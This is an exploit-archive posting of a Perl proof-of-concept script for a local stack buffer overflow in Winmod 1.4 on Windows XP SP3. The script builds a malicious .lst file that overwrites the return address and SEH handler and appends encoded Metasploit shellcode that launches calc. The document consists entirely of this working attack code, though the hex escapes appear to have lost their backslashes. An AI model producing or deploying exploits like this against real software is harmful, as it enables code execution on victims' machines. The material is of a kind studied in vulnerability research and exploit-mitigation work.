winmodlstxpsp3-overflow.txt
Posted on 28 July 2009
# # Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH) # http://www.software112.com/products/winmod+download.html # # Exploit for Windows XP SP3 (en) # # by corelan - c0d3r # Greetings to Saumil and SK # my $sploitfile = "c:\program files\winmod\xpl_sp3.lst"; my $buf="x41" x 500; $buf=$buf.pack('V',0x76B2D577); $buf=$buf."x41" x (2880-500); my $nseh = "xEBx06x90x90"; my $seh=pack('V',0x7C972ECD); my $nop = "x90" x 20; ## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode="xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49". "x49x49x49x49x37x49x49x49x49x49x49x49x51x5ax6ax41". "x58x50x30x42x31x41x42x6bx42x41x51x32x42x42x32x41". "x41x30x41x41x42x58x38x42x42x50x75x4bx59x4bx4cx59". "x78x52x64x63x30x65x50x53x30x4ex6bx57x35x77x4cx6c". "x4bx61x6cx63x35x73x48x67x71x48x6fx6ex6bx50x4fx45". "x48x6ex6bx53x6fx61x30x73x31x38x6bx53x79x4ex6bx66". "x54x6ex6bx46x61x38x6ex30x31x6bx70x6ex79x6ex4cx4f". "x74x79x50x74x34x44x47x4fx31x59x5ax76x6dx55x51x59". "x52x68x6bx4ax54x35x6bx71x44x65x74x37x74x31x65x4a". "x45x6ex6bx73x6fx44x64x55x51x4ax4bx50x66x4cx4bx44". "x4cx30x4bx6ex6bx53x6fx37x6cx46x61x58x6bx6cx4bx77". "x6cx6ex6bx46x61x5ax4bx4fx79x31x4cx47x54x37x74x6a". "x63x74x71x59x50x70x64x6ex6bx51x50x50x30x6ex65x4b". "x70x72x58x64x4cx6cx4bx71x50x56x6cx4ex6bx52x50x57". "x6cx6cx6dx4cx4bx63x58x73x38x5ax4bx45x59x4ex6bx4f". "x70x4cx70x35x50x43x30x63x30x4cx4bx53x58x77x4cx73". "x6fx56x51x48x76x53x50x66x36x4fx79x39x68x6fx73x39". "x50x61x6bx30x50x61x78x4ax50x6cx4ax73x34x33x6fx45". "x38x6dx48x49x6ex6cx4ax46x6ex76x37x69x6fx48x67x45". "x33x73x51x72x4cx71x73x63x30x41"; $buf = $buf.$nseh.$seh.$nop.$shellcode; print "[+] Writing exploit file "; open(FILE,'>$sploitfile'); print FILE $buf; close (FILE); print "[+] Exploit file written : $sploitfile "; print "[+] File's name is xpl_sp3.lst ";
